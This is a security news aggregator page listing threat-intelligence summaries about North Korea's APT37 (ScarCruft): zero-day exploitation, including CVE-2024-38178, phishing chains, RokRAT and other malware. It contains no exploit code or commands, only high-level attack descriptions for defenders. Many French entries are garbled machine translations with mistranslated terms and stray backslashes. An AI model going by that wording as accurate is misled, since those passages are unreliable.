SEC News

What's new arround internet

Last one

Src	Date (GMT)	Titre	Description	Tags	Stories	Notes
	2025-04-29 05:00:00	Bonjour 0 jours, mon vieil ami: une analyse d'exploitation du 2024 zéro-jour Hello 0-Days, My Old Friend: A 2024 Zero-Day Exploitation Analysis (lien direct)	Écrit par: Casey Charrier, James Sadowski, Clement Lecigne, Vlad Stolyarov Résumé exécutif GoogleThreat Intelligence Group (GTIG) tracked 75 zero-day vulnerabilities exploited in the wild in 2024, a decrease from the number we identified in 2023 (98 vulnerabilities), but still an increase from 2022 (63 vulnerabilities). We divided the reviewed vulnerabilities into two main categories: end-user platforms and products (e.g., mobile devices, operating systems, and browsers) and enterprise-focused technologies, such as security software and appliances. Vendors continue to drive improvements that make some zero-day exploitation harder, demonstrated by both dwindling numbers across multiple categories and reduced observed attacks against previously popular targets. At the same time, commercial surveillance vendors (CSVs) appear to be increasing their operational security practices, potentially leading to decreased attribution and detection. We see zero-day exploitation targeting a greater number and wider variety of enterprise-specific technologies, although these technologies still remain a smaller proportion of overall exploitation when compared to end-user technologies. While the historic focus on the exploitation of popular end-user technologies and their users continues, the shift toward increased targeting of enterprise-focused products will require a wider and more diverse set of vendors to increase proactive security measures in order to reduce future zero-day exploitation attempts. Scope This report describes what Google Threat Intelligence Group (GTIG) knows about zero-day exploitation in 2024. We discuss how targeted vendors and exploited products drive trends that reflect threat actor goals and shifting exploitation approaches, and then closely examine several examples of zero-day exploitation from 2024 that demonstrate how actors use both historic and novel techniques to exploit vulnerabilities in targeted products. The following content leverages original research conducted by GTIG, combined with breach investigation findings and reporting from reliable open sources, though we cannot independently confirm the reports of every source. Research in this space is dynamic and the numbers may adjust due to the ongoing discovery of past incidents through digital forensic investigations. The numbers presented here reflect our best understanding of current data. GTIG defines a zero-day as a vulnerability that was maliciously exploited in the wild before a patch was made publicly available. GTIG acknowledges that the trends observed and discussed in this report are based on detected and disclosed zero-days. Our analysis represents exploitation tracked by GTIG but may not reflect all zero-day exploitation. aside_block Key Takeaways Zero-day exploitation continues to grow gradually. The 75 zero-day vulnerabilities exploited in 2024 follow a pattern that has emerged	Malware Tool Vulnerability Threat Patching Mobile Prediction Cloud Commercial	APT 37	★★
	2024-11-11 12:45:44	Faits saillants hebdomadaires, 11 novembre 2024 (lien direct)	## Instantané La semaine dernière, le rapport \\\\\\\\\\\\\ \ \ ait le rapport a mis en évidence un paysage à multiples facettes de cybermenaces motivé par diverses tactiques, vecteurs et cibles. L'analyse a souligné l'utilisation persistante du phishing comme vecteur dominant, allant de la lance sophistiquée ciblant les entités sud-coréennes par APT37 à des campagnes à grande échelle en Ukraine par l'UAC-0050. Des groupes avancés de menace persistante (APT) comme Sapphire Sleet, APT-36 et TA866 ont utilisé des méthodes furtives, y compris des logiciels malveillants modulaires et des outils RMM, pour atteindre l'espionnage et le gain financier. Les vulnérabilités d'infrastructures critiques, comme celles des systèmes Synology NAS et Palo Alto, ont en outre souligné les risques pour les dispositifs d'entreprise et de consommation. Les acteurs de la menace, notamment des groupes parrainés par l'État et des cybercriminels, des outils à effet de levier comme les logiciels malveillants de cryptomine, les botnets sophistiqués et les nouveaux rats pour étendre leur contrôle sur les systèmes, tandis que les élections influencent les opérations par des entités russes et iraniennes ont mis en lumière les dimensions géopolitiques des cyber-activités. Dans l'ensemble, la semaine a révélé un paysage de menaces en évolution marqué par des méthodes d'attaque adaptatives ciblant les institutions financières, les agences gouvernementales et les utilisateurs de tous les jours. ## Description 1. [Attaque silencieuse de l'écumeur] (https://sip.security.microsoft.com/intel-explorer/articles/2f001d21): l'unité 42 a suivi un compromis de serveur Web ciblant une organisation multinationale nord-américaine, liée à la campagne silencieuse de la campagne Skimmer Volet données de paiement en ligne. Les attaquants ont utilisé des vulnérabilités de Telerik UI, établi la persistance via des coquilles Web et des données exfiltrées à l'aide d'outils de tunneling. 1. [Bundle Steelfox Crimeware] (https://sip.security.microsoft.com/intel-explorer/articles/0661f634): une nouvelle étendue de paquet de logiciels malveillants via de faux activateurs de logiciels effectue une attaque multi-étages impliquant un theft de données et une cryptominage. Il cible principalement les utilisateurs du monde entier en exploitant les vulnérabilités de Windows pour élever les privilèges et maintenir la persistance. 1. [CloudComptation \\\\\\\\\\\\\\ ’scolatics d’espionnage évolutif] (https://sip.security.microsoft.com/intel-explorer/articles/792a6266): SecureList de Kaspersky a rapporté que CloudComputation (backdoordiplomacy) est passé à l'utilisation du framework QSC, un malware multi-plugine Outil conçu pour l'exécution des modules en mémoire, améliorant la furtivité et la persistance. Les attaques du groupe \\\\\\\\\\\\\ \\\ \ \\\\\\\\\ \ \ \ \ opérations système. 1. [Remcos Rat Phishing Campaign] (https://sip.security.microsoft.com/intel-explorer/articles/d36e3ff1): Fortiguard Labs a découvert une campagne de phishing déploiement des rat remcos via des documents Ole Excel ole excel qui exploitent les vulnérabilités de Microsoft. Cette attaque tire parti des techniques d'anti-analyse, de la livraison de charge utile sans fil et de la manipulation du système pour la persistance, permettant aux attaquants de contrôler les appareils de victime, de collecter des données et de communiquer avec un serveur de commandement et de contrôle à l'aide de canaux cryptés. 1. [Wish Stealer Malware] (https://sip.security.microsoft.com/intel-explorer/articles/a11d08f6): Cyfirma a découvert un voleur d'informations Windows ciblant la discorde, les navigateurs Web et les portefeuilles de crypto-monnaie. Il utilise le détournement de presse-papiers, les fonctionnalités anti-détection et la discorde pour l'exfiltration des données, posant des risques à la sécurité des utilisateurs. 1. [Apt37 ciblant la Corée du Sud] (https://sip.security.microsoft.com/in	Ransomware Malware Tool Vulnerability Threat Mobile Cloud	APT 37	★★★
	2024-10-21 11:41:26	Faits saillants hebdomadaires OSINT, 21 octobre 2024 Weekly OSINT Highlights, 21 October 2024 (lien direct)	## Instantané La semaine dernière, les rapports OSINT de \\ mettent en évidence une gamme diversifiée de cybermenaces et d'évolution des vecteurs d'attaque.L'ingénierie sociale reste une tactique répandue, avec des campagnes telles que ClickFix tirant parti de faux messages d'erreur pour distribuer des logiciels malveillants, tandis que la campagne d'interview contagieuse CL-Sta-240 cible les demandeurs d'emploi en utilisant des logiciels malveillants déguisés en applications d'appel vidéo.Les voleurs d'informations, tels que Lumma et Meduza, continuent de proliférer et de tirer parti des plates-formes distribuées comme Telegram et Github.Les acteurs de ransomware exploitent les services cloud, comme le montre la campagne Ransomware abusant Amazon S3.Des groupes de l'État-nation, dont la Corée du Nord, l'Iran et la Chine, persistent à cibler des infrastructures critiques et des entités gouvernementales utilisant des techniques d'évasion sophistiquées et des outils open source, tandis que les acteurs motivés financièrement se concentrent sur les chevaux de Troie bancaires et le vol de crypto-monnaie.Ces tendances soulignent la sophistication et la diversité croissantes des acteurs de la menace \\ 'tactiques, à la fois avec les APT de l'État-nation et les cybercriminels ciblant un large éventail de secteurs. ## Description 1. [ClickFix Social Engineering Tactic] (https://sip.security.microsoft.com/intel-explorer/articles/6d79c4e3): Les chercheurs de Sekoia ont identifié Clickfix, une nouvelle tactique d'ingénierie sociale tirant parti de faux messages d'erreur de navigateur pour exécuter Male PowerShell malveillantCommandes.Il a été utilisé par des groupes comme l'Empire national slave et Scamquerteo pour distribuer des infostelleurs, des rats et des botnets ciblant la crypto-monnaie et les utilisateurs de Web3. 2. [Lumma Stealer Distribution via Hijackloader] (https://sip.security.microsoft.com/intel-explorer/articles/ef6514e6): les chercheurs de HarfangLab ont observé une augmentation de la distribution de voleur Lumma en utilisant Hijackloader avec des certificats de signature de code pour les défenses de bypass Lumma.Ces campagnes ont ciblé les utilisateurs à travers de fausses pages CAPTCHA, conduisant à une exécution de logiciels malveillants avec des certificats signés de sociétés légitimes. 3. [Meduza Stealer Spread via Telegram] (https://sip.security.microsoft.com/intel-explorer/articles/ac988484): CERT-UA a rapporté le voleur de Meduza distribué par des messages télégramme, exhortant les utilisateurs à télécharger "Special Special.logiciel."Les logiciels malveillants ont ciblé les entreprises ukrainiennes et volé des documents avant l'auto-délétion pour éviter la détection. 4. [Ransomware exploitant Amazon S3] (https://sip.security.microsoft.com/intel-explorer/articles/f5477a4): TrendMicro a identifié une campagne de ransomware exploitant la fonction d'accélération d'Amazon S3 \\ S pour l'expiltration de données.Déguisé en Lockbit, ce ransomware cible Windows et MacOS, en utilisant des informations d'identification AWS pour les téléchargements de données tout en tirant parti des techniques de chiffrement aux victimes de pression. 5. [AI abusité dans les opérations cyber] (https://sip.security.microsoft.com/intel-explorer/articles/e46070dd): OpenAI a rapporté plus de 20 cas d'utilisation abusive de l'IA par des acteurs malveillants pour le développement de logiciels malveillants, la désinformation et la lancePhishing.Les acteurs de la menace, dont Storm-0817 et SweetSpecter, ont exploité l'IA pour des tâches telles que la reconnaissance et le débogage du code, tandis que les IOS secrets ont été retracés en Iran et au Rwanda. 6. [Variants de trojan bancaires Trickmo] (https://sip.security.microsoft.com/intel-explorer/articles/1f1ea18b): les chercheurs de zimpérium ont découvert 40 variantes de tro-bancs Trickmo capables de l'interception OTP, de l'enregistrement de l'écran et de dispositif de dispositif de dispos	Ransomware Malware Tool Vulnerability Threat Cloud	APT 38 APT 37 APT-C-17	★★
	2024-10-21 01:00:00	DPRC utilise Microsoft Zero-Day dans des attaques de pain grillé sans clics DPRK Uses Microsoft Zero-Day in No-Click Toast Attacks (lien direct)	Les cyberattaques de la chaîne d'approvisionnement "Code-on-Toast" par APT37 ont livré des logiciels malveillants de vol de données aux utilisateurs de Corée du Sud qui avaient activé des publicités pop-up toast. The "Code-on-Toast" supply chain cyberattacks by APT37 delivered data-stealing malware to users in South Korea who had enabled Toast pop-up ads.	Malware Vulnerability Threat	APT 37	★★
	2024-10-18 20:53:46	Malicious ads exploited Internet Explorer zero day to drop malware (lien direct)	## Instantané Ahnlab Security Intelligence Center et le National Cyber Security Center ont découvert une vulnérabilité zéro-jour dans le moteur de navigateur Internet Explorer, qui n'est plus soutenu, exploité par l'acteur de menace nord-coréen Scarcruft. ## Description Scarcruft (suivi par Microsoft comme [Pearl Sleet] (https://security.microsoft.com/intel-profiles/cc39cf4403d3dde8270a88784017b42c410a89ce1c94f232fa811059066d9e)) vulnérabilité pour exploiter un programme d'annonce de toast qui vientavec divers logiciels gratuits.Une annonce de toast est un type d'alerte contextuelle qui apparaît généralement en bas de l'écran de bureau.Scarcruft a lancé son attaque en compromettant un serveur coréen en ligne de publicité \\, injectant du code malveillant dans le script de contenu publicitaire.Cela a conduit à une attaque zéro-clic, sans interaction utilisateur, lorsque le programme publicitaire a téléchargé et rendu le contenu publicitaire compromis.La vulnérabilité, identifiée comme [CVE-2024-38178] (https://security.microsoft.com/intel-explorer/cves/cve-2024-38178/), se produit lorsqu'un type de données est traité par erreur comme un autre pendant leProcessus d'optimisation du moteur JavaScript d'Internet Explorer \\ (JScript9.dll), permettant aux attaquants de inciter les victimes à télécharger le malware.Microsoft a depuis publié une [mise à jour de sécurité] (https://msrc.microsoft.com/update-guide/vulnerabilité/CVE-2024-38178) pour aborder cette vulnérabilité. ## Recommandations Appliquez ces atténuations pour réduire l'impact de cette menace. - Pour déterminer le cycle de vie du support pour votre logiciel, consultez le [Microsoft Support Lifecycle] (https://support.microsoft.com/lifecycle).Consultez la [Politique LifeCycle pour Internet Explorer] (https://learn.microsoft.com/en-us/lifecycle/faq/internet-explorer-microsoft-edge#what-is-the- lifecycle-policy-for-internet-explorateur-). - Utilisez la gestion de la vulnérabilité Microsoft Defender pour identifier et aborder [vulnérabilités zéro-jour] (https://learn.microsoft.com/en-us/defender-vulnerabilité-management/tvm-zero-ay-vulnerabilities). - Encouragez les utilisateurs à utiliser Microsoft Edge et d'autres navigateurs Web qui prennent en charge [SmartScreen] (https://learn.microsoft.com/en-us/windows/security/operating-system-security/virus-and-thereat-protection/microsoft-Defender-SmartScreen /), qui identifie et bloque des sites Web malveillants, y compris des sites de phishing, des sites d'arnaque et des sites qui hébergent des logiciels malveillants.[Allumez la protection du réseau] (https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/enable-network-protection?ocid=Magicti%3CEM%3ETA%3C/em%3ElearnDoc) pour bloquer les connexions aux domaines malveillants et aux adresses IP. - Créer une résilience organisationnelle en éduquant les utilisateurs sur la prévention de l'infection des logiciels malveillants.Utilisez [Formation de simulation d'attaque] (https://learn.microsoft.com/microsoft-365/security/office-365-security/attack-simulation-training-get-started?ocid=Magicti%3CEM%3ETA%3C/EM% 3ElearnDoc) dans Microsoft Defender pour Office 365 pour exécuter des scénarios d'attaque, accroître la sensibilisation des utilisateurs et permettre aux employés de reconnaître et de signaler ces attaques. - Allumez [Protection en cloud-élivé] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/enable-cloud-protection-microsoft-defender-antivirus?ocid=Magicti%3CEM%3ETA%3C / EM% 3ELEARNDOC) et soumission automatique des échantillons sur Microsoft Defender Antivirus.Ces capacités utilisent l'intelligence artificielle et l'apprentissage automatique pour identifier et arrêter rapidement les menaces nouvelles et inconnues. ## références [Sleet Pearl] (https://security.microsoft.com/intel-profiles/cc39ccf4403d3dde8270a88784017b42c410a89cea1c94F232FA811059066D9E).Microsoft (2024-10-18) [Les publicités malveillant	Malware Vulnerability Threat	APT 37	★★★
	2024-10-16 16:20:00	Scarcruft nord-coréen exploite Windows Zero-Day pour répandre le malware Rokrat North Korean ScarCruft Exploits Windows Zero-Day to Spread RokRAT Malware (lien direct)	L'acteur de menace nord-coréen connue sous le nom de Scarcruft a été lié à l'exploitation zéro-jour d'un défaut de sécurité désormais réglé dans Windows pour infecter les appareils avec des logiciels malveillants connus sous le nom de Rokrat. La vulnérabilité en question est CVE-2024-38178 (score CVSS: 7.5), un bogue de corruption de mémoire dans le moteur de script qui pourrait entraîner l'exécution du code distant lors de l'utilisation du navigateur Edge en mode Explorer Internet. The North Korean threat actor known as ScarCruft has been linked to the zero-day exploitation of a now-patched security flaw in Windows to infect devices with malware known as RokRAT. The vulnerability in question is CVE-2024-38178 (CVSS score: 7.5), a memory corruption bug in the Scripting Engine that could result in remote code execution when using the Edge browser in Internet Explorer Mode.	Malware Vulnerability Threat	APT 37	★★
	2024-10-16 09:59:12	Les publicités malveillantes ont exploité Internet Explorer Zero Day pour laisser tomber les logiciels malveillants Malicious ads exploited Internet Explorer zero day to drop malware (lien direct)	Le groupe de piratage nord-coréen Scarcruft a lancé une attaque à grande échelle en mai qui a exploité un défaut zéro-jour Internet Explorer pour infecter les cibles avec les logiciels malveillants Rokrat et les données exfiltrates.[...] The North Korean hacking group ScarCruft launched a large-scale attack in May that leveraged an Internet Explorer zero-day flaw to infect targets with the RokRAT malware and exfiltrate data. [...]	Malware Vulnerability Threat	APT 37	★★
	2024-10-07 16:54:11	Faits saillants hebdomadaires OSINT, 7 octobre 2024 Weekly OSINT Highlights, 7 October 2024 (lien direct)	## Snapshot Last week\'s OSINT reporting highlights diverse and sophisticated attack tactics, primarily focusing on nation-state actors, cybercriminal groups, and advanced malware campaigns. Common attack vectors include spear-phishing, exploiting vulnerabilities (such as CVEs in Linux servers and AI infrastructure), and malware delivered through fileless methods. The malware ranges from Joker\'s subscription fraud (targeting mobile devices) to more complex backdoors like WarmCookie, which allows system profiling and further malware deployment. North Korean APT groups (APT37 and Stonefly) remain active, targeting Southeast Asia and United States companies, while Iranian actors focus on political campaigns. Financially motivated attacks are also prominent, with ransomware groups like Meow and attackers using MedusaLocker deploying advanced techniques for exfiltration and encryption. Cloud environments and AI infrastructure, including generative models like AWS Bedrock, have emerged as critical targets, exposing new vulnerabilities for resource hijacking and illicit services. ## Description 1. [Golden Chickens\' More_Eggs](https://sip.security.microsoft.com/intel-explorer/articles/4cb94d70): Trend Micro discovered the use of the more\_eggs backdoor in spear-phishing attacks, targeting various industries. Recent campaigns involved advanced social engineering, and while attribution remains unclear, there are possible ties to FIN6 (Storm-0538). 2. [Linux Malware Campaign](https://sip.security.microsoft.com/intel-explorer/articles/68e49ad7): Elastic Security Labs uncovered a Linux malware campaign using KAIJI for DDoS attacks and RUDEDEVIL for cryptocurrency mining. The attackers exploited Apache2 vulnerabilities and used Telegram bots for communication and persistence. 3. [Rhadamanthys Malware Updates](https://sip.security.microsoft.com/intel-explorer/articles/c9ea8588): Recorded Future reported on the evolving Rhadamanthys information-stealing malware, now incorporating AI-driven OCR for cryptocurrency theft. It targets systems in North and South America, leveraging encryption and advanced defense evasion techniques. 4. [NVIDIA Container Toolkit Vulnerability](https://sip.security.microsoft.com/intel-explorer/articles/a35e980e): Wiz Research discovered a critical vulnerability (CVE-2024-0132) in the NVIDIA Container Toolkit, exposing cloud and AI environments to container escape attacks. This flaw could lead to unauthorized control over host systems and data exfiltration. 5. [K4Spreader and PwnRig Campaign](https://sip.security.microsoft.com/intel-explorer/articles/416b07c0): Sekoia TDR linked a campaign exploiting WebLogic vulnerabilities to the 8220 Gang, deploying the K4Spreader malware and PwnRig cryptominer. The attackers primarily target cloud environments for Monero mining, exploiting both Linux and Windows systems. 6. [Nitrogen Malware Incident](https://sip.security.microsoft.com/intel-explorer/articles/d0473059): The DFIR Report analyzed an attack using Nitrogen malware delivered through a malicious Advanced IP Scanner installer. The threat actor used Sliver and Cobalt Strike beacons, eventually deploying BlackCat ransomware across the victim\'s network. 7. [Gorilla Botnet\'s DDoS Attacks](https://sip.security.microsoft.com/intel-explorer/articles/0bcef023): NSFOCUS identified the Gorilla Botnet, a Mirai variant, launching over 300,000 DDoS attacks. Its primary targets were U.S., Chinese, and global sectors, including government and telecom, using advanced encryption techniques for stealth. 8. [Iranian IRGC Cyber Activity](https://sip.security.microsoft.com/intel-explorer/articles/42850d7b): The FBI and UK\'s NCSC warned about Iranian IRGC-affiliated actors targeting individuals related to Middle Eastern affairs. Using social engineering, they focused on stealing credentials and influencing U.S. political campaigns. 9. [Critical Infrastructure Reconnaissance](https://sip.security.microsoft.com/intel-explorer/articles/d491ff08): Dragos detected a campaign targeting North Ame	Ransomware Malware Tool Vulnerability Threat Mobile Prediction Cloud	APT 37 APT 45	★★
	2024-10-03 20:13:46	Enveloppe # Sleep: une plongée profonde dans la campagne en cours de la Corée du Nord contre l'Asie du Sud-Est SHROUDED#SLEEP: A Deep Dive into North Korea\\'s Ongoing Campaign Against Southeast Asia (lien direct)	#### Géolocations ciblées - Cambodge - Asie du Sud-Est ## Instantané L'équipe de recherche sur les menaces de Securonix a identifié une cyber campagne en cours, surnommée # enveloppe # Sleep, qui semble être réalisée par le groupe de menaces nord-coréen, APT37. ## Description Cette campagne vise des pays d'Asie du Sud-Est, avec un accent principal sur le Cambodge.Les attaquants utilisent des techniques d'évasion avancées pour fournir Veilshell, un malware furtif basé sur PowerShell.L'infection initiale est obtenue par des e-mails de phishing contenant des fichiers zip avec des pièces jointes malveillantes (.lnk) déguisées en documents légitimes. Une fois le raccourci cliqué, il déclenche un script PowerShell qui extrait et décode plusieurs charges utiles, y compris un fichier DLL malveillant (DomainManager.dll), qui est placé dans le dossier de démarrage pour assurer la persistance.Le logiciel malveillant ne s'exécute pas avant le prochain redémarrage du système, ajoutant à sa nature furtive.Les attaquants utilisent également des techniques telles que AppDomainManager détournant pour maintenir la persistance et utiliser des méthodes sans fil pour éviter la détection par des outils de sécurité. Le Veilshell Backdoor accorde aux attaquants un contrôle complet sur les machines infectées, permettant des actions telles que l'exfiltration des fichiers, les modifications du registre et la création de tâches planifiée.Cette opération sophistiquée est remarquable pour son approche méthodique, y compris de longs temps de sommeil pour échapper aux détections heuristiques, et son utilisation de processus Windows légitimes pour exécuter des commandes. ## Analyse supplémentaire [APT37] (https://attack.mitre.org/groups/g0067/) est un acteur avancé de menace persistant parrainé par l'État nordvictimes principalement en Corée du Sud, mais aussi dans d'autres pays intéressés par la Corée du Nord.According to [Mandiant](https://cloud.google.com/blog/topics/threat-intelligence/mapping-dprk-groups-to-government/), APT37\'s primary goal is likely ingelligence gathering in support ofLes intérêts militaires, politiques et économiques nord-coréens et le groupe peuvent être alignés sur le ministère de la Sécurité des États de la Corée du Nord (MSS). L'APT37 a été observé à l'aide d'exploits zéro jour et d'attaques de phisces de lance en collaboration avec une variété de logiciels malveillants différents, y compris [Dolphin] (https://www.welivesecurity.com/2022/11/30/whos-swinking-south-korean-Waters-Met-Scarcrufts-Dolphin /), [Chinotto] (https://www.zscaler.com/blogs/security-research/unintinal-leak-glimpse-attack- vectors-apt37), [Rokrat] (https://research.checkpoint.com/2023/chain-reaconde-rokrats-missing-link/), [Goldbackdoor] (https://otx.alienvault.com/pulse/626fd3461d762068c921f7c0), et [m2rat] (https: //asec.ahnlab.com/ko/47622/), entre autres. ### Microsoft Defender Antivirus Microsoft Defender Antivirus détecte les composants de menace comme le FOLlowing malware: - [Trojan: win32 / znyonm] (https://www.microsoft.com/en-us/wdsi/therets/malware-encycopedia-dercription?name=worm:win32/znyonm) - [Trojan: Win32 / Leonem] (https://www.microsoft.com/en-us/wdsi/therets/malware-encycopedia-dercription?name=trojan:win32/leonem) - [Trojan: MSIL / Malgent! MSR] (https://www.microsoft.com/en-us/wdsi/therets/malware-encycopedia-description?name=trojan:mil/malgent!msr) - [Trojandownloader: Msil / small] (https://www.microsoft.com/en-us/wdsi/therets/malware-encycopedia-description? name = trojandownloader: MSIL / small) ## références [Enveloppe # Sleep: une plongée profonde dans la campagne en cours de la Corée du Nord contre l'Asie du Sud-Est] (https://www.securonix.com/blog/shroudededsleep-a-deep-dive-into-north-koreas-ongoing-Campagne-Against-Southeast-Asia /).Securonix (consulté en 2024-10-03) ## Copyright &copie;Microsoft 2024 .Tous droits réservés	Malware Tool Vulnerability Threat Cloud	APT 37	★★★
	2023-06-13 13:00:00	CyberheistNews Vol 13 # 24 [Le biais de l'esprit \\] le prétexage dépasse désormais le phishing dans les attaques d'ingénierie sociale CyberheistNews Vol 13 #24 [The Mind\\'s Bias] Pretexting Now Tops Phishing in Social Engineering Attacks (lien direct)	CyberheistNews Vol 13 #24 \| June 13th, 2023 [The Mind\'s Bias] Pretexting Now Tops Phishing in Social Engineering Attacks The New Verizon DBIR is a treasure trove of data. As we will cover a bit below, Verizon reported that 74% of data breaches Involve the "Human Element," so people are one of the most common factors contributing to successful data breaches. Let\'s drill down a bit more in the social engineering section. They explained: "Now, who has received an email or a direct message on social media from a friend or family member who desperately needs money? Probably fewer of you. This is social engineering (pretexting specifically) and it takes more skill. "The most convincing social engineers can get into your head and convince you that someone you love is in danger. They use information they have learned about you and your loved ones to trick you into believing the message is truly from someone you know, and they use this invented scenario to play on your emotions and create a sense of urgency. The DBIR Figure 35 shows that Pretexting is now more prevalent than Phishing in Social Engineering incidents. However, when we look at confirmed breaches, Phishing is still on top." A social attack known as BEC, or business email compromise, can be quite intricate. In this type of attack, the perpetrator uses existing email communications and information to deceive the recipient into carrying out a seemingly ordinary task, like changing a vendor\'s bank account details. But what makes this attack dangerous is that the new bank account provided belongs to the attacker. As a result, any payments the recipient makes to that account will simply disappear. BEC Attacks Have Nearly Doubled It can be difficult to spot these attacks as the attackers do a lot of preparation beforehand. They may create a domain doppelganger that looks almost identical to the real one and modify the signature block to show their own number instead of the legitimate vendor. Attackers can make many subtle changes to trick their targets, especially if they are receiving many similar legitimate requests. This could be one reason why BEC attacks have nearly doubled across the DBIR entire incident dataset, as shown in Figure 36, and now make up over 50% of incidents in this category. Financially Motivated External Attackers Double Down on Social Engineering Timely detection and response is crucial when dealing with social engineering attacks, as well as most other attacks. Figure 38 shows a steady increase in the median cost of BECs since 2018, now averaging around $50,000, emphasizing the significance of quick detection. However, unlike the times we live in, this section isn\'t all doom and	Spam Malware Vulnerability Threat Patching	Uber APT 37 ChatGPT ChatGPT APT 43	★★
	2023-05-01 23:16:00	Anomali Cyber Watch: APT37 adopte les fichiers LNK, Charming Kitten utilise le bordereau d'implant Bellaciao, le cryptage de remappage d'octet unique Vipersoftx InfostEaler Anomali Cyber Watch: APT37 Adopts LNK Files, Charming Kitten Uses BellaCiao Implant-Dropper, ViperSoftX Infostealer Unique Byte Remapping Encryption (lien direct)	Les diverses histoires de l'intelligence des menaces dans cette itération de l'anomali cyber watch discutent les sujets suivants: apt, Remapping, Cloud C2s, Infostalers, Iran, Corée du Nord, Rats, et vulnérabilités .Les CIO liés à ces histoires sont attachés à Anomali Cyber Watch et peuvent être utilisés pour vérifier vos journaux pour une activité malveillante potentielle. Figure 1 - Diagrammes de résumé du CIO.Ces graphiques résument les CIO attachés à ce magazine et donnent un aperçu des menaces discutées. Cyber News et Intelligence des menaces Réaction en chaîne: Rokrat & rsquo; s.Lien manquant (Publié: 1er mai 2023) Depuis 2022, le groupe parrainé par le Nord-Korea APT37 (Group123, Ricochet Chollima) a principalement changé ses méthodes de livraison de Maldocs pour cacher des charges utiles à l'intérieur des fichiers LNK surdimensionnés.Vérifier les chercheurs a identifié plusieurs chaînes d'infection utilisées par le groupe de juillet 2022 à avril 2023. Celles-ci ont été utilisées pour livrer l'un des outils personnalisés de l'APT37 (Goldbackdoor et Rokrat), ou le malware de marchandises Amadey.Tous les leurres étudiés semblent cibler des personnes coréennes avec des sujets liés à la Corée du Sud. Commentaire de l'analyste: Le passage aux chaînes d'infection basées sur LNK permet à APT37 de l'interaction utilisateur moins requise car la chaîne peut être déclenchée par un simple double clic.Le groupe continue l'utilisation de Rokrat bien triés qui reste un outil furtif avec ses couches supplémentaires de cryptage, le cloud C2 et l'exécution en mémoire.Les indicateurs associés à cette campagne sont disponibles dans la plate-forme Anomali et il est conseillé aux clients de les bloquerleur infrastructure. mitre att & amp; ck: [mitre att & amp; ck] t1059.001: Powershell \| [mitre att & amp; ck] t1055 - injection de processus \| [mitre att & amp; ck] t1027 - fichiers ou informations obscurcis \| [mitre att & amp; ck] t1105 - transfert d'outils d'entrée \| [mitre att & amp; ck] t1204.002 - Exécution des utilisateurs: fichier malveillant \| [mitre att & amp; ck] t1059.005 - commande et script interprète: visuel basique \| [mitre att & amp; ck] t1140 - désobfuscate / décode ou informations \| [mitre att & amp; ck] T1218.011 - Exécution par proxy binaire signée: Rundll32 Tags: malware: Rokrat, mitre-software-id: s0240, malware-Type: Rat, acteur: Groupe123, mitre-groupe: APT37, acteur: Ricochet Chollima, Country source: Corée du Nord, Country source: KP, Cible-Country: Corée du Sud, Cible-Country: KR, Type de fichier: Zip, déposer-Type: Doc, Fichier-Type: ISO, Fichier-Type: LNK, File-Type: Bat, File-Type: EXE, Fichier-Type: VBS, malware: Amadey,MALWARE: Goldbackdoor, Type de logiciels malveillants: porte dérobée, abusée: Pcloud, abusé: Cloud Yandex, abusé: OneDrive, abusé: & # 8203; & # 8203; Processeur de mots Hangul, abusé: themida, système cible: Windows	Ransomware Malware Tool Vulnerability Threat Prediction Cloud	APT 37 APT 37 APT 35	★★
	2023-02-21 01:00:00	HWP Malware Using the Steganography Technique: RedEyes (ScarCruft) (lien direct)	In January, the ASEC (AhnLab Security Emergency response Center) analysis team discovered that the RedEyes threat group (also known as APT37, ScarCruft) had been distributing malware by exploiting the HWP EPS (Encapsulated PostScript) vulnerability (CVE-2017-8291). This report will share the RedEyes group’s latest activity in Korea. 1. Overview The RedEyes group is known for targeting specific individuals and not corporations, stealing not only personal PC information but also the mobile phone data of their targets. A distinct characteristic of the...	Malware Vulnerability Threat Cloud	APT 37	★★★
	2022-12-08 13:29:00	Google Warns of Internet Explorer Zero-Day Vulnerability Exploited by ScarCruft Hackers (lien direct)	An Internet Explorer zero-day vulnerability was actively exploited by a North Korean threat actor to target South Korean users by capitalizing on the recent Itaewon Halloween crowd crush to trick users into downloading malware. The discovery, reported by Google Threat Analysis Group researchers Benoît Sevens and Clément Lecigne, is the latest set of attacks perpetrated by ScarCruft, which is	Vulnerability Threat Cloud	APT 37	★★★
	2022-08-30 15:01:00	Anomali Cyber Watch: First Real-Life Video-Spoofing Attack, MagicWeb Backdoors via Non-Standard Key Identifier, LockBit Ransomware Blames Victim for DDoSing Back, and More (lien direct)	The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Authentication, DDoS, Fingerprinting, Iran, North Korea, Ransomware, and Russia. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence LastPass Hackers Stole Source Code (published: August 26, 2022) In August 2022, an unidentified threat actor gained access to portions of the password management giant LastPass development environment. LastPass informed that it happened through a single compromised developer account and the attacker took portions of source code and some proprietary LastPass technical information. The company claims that this incident did not affect customer data or encrypted password vaults. Analyst Comment: This incident doesn’t seem to have an immediate impact on LastPass users. Still, organizations relying on LastPass should raise the concern in their risk assessment since “white-box hacking” (when source code of the attacking system is known) is easier for threat actors. Organizations providing public-facing software should take maximum measures to block threat actors from their development environment and establish robust and transparent security protocols and practices with all third parties involved in their code development. Tags: LastPass, Password manager, Data breach, Source code Mercury Leveraging Log4j 2 Vulnerabilities in Unpatched Systems to Target Israeli (published: August 25, 2022) Starting in July 2022, a new campaign by Iran-sponsored group Static Kitten (Mercury, MuddyWater) was detected targeting Israeli organizations. Microsoft researchers detected that this campaign was leveraging exploitation of Log4j 2 vulnerabilities (CVE-2021-45046 and CVE-2021-44228) in SysAid applications (IT management tools). For persistence Static Kitten was dropping webshells, creating local administrator accounts, stealing credentials, and adding their tools in the startup folders and autostart extensibility point (ASEP) registry keys. Overall the group was heavily using various open-source and built-in operating system tools: eHorus remote management software, Ligolo reverse tunneling tool, Mimikatz credential theft tool, PowerShell programs, RemCom remote service, Venom proxy tool, and Windows Management Instrumentation (WMI). Analyst Comment: Network defenders should monitor for alerts related to web shell threats, suspicious RDP sessions, ASEP registry anomaly, and suspicious account creation. Similarly, SysAid users can monitor for webshells and abnormal processes related to SysAisServer instance. Even though Static Kitten was observed leveraging the Log4Shell vulnerabilities in the past (targeting VMware apps), most of their attacks still start with spearphishing, often from a compromised email account. MITRE 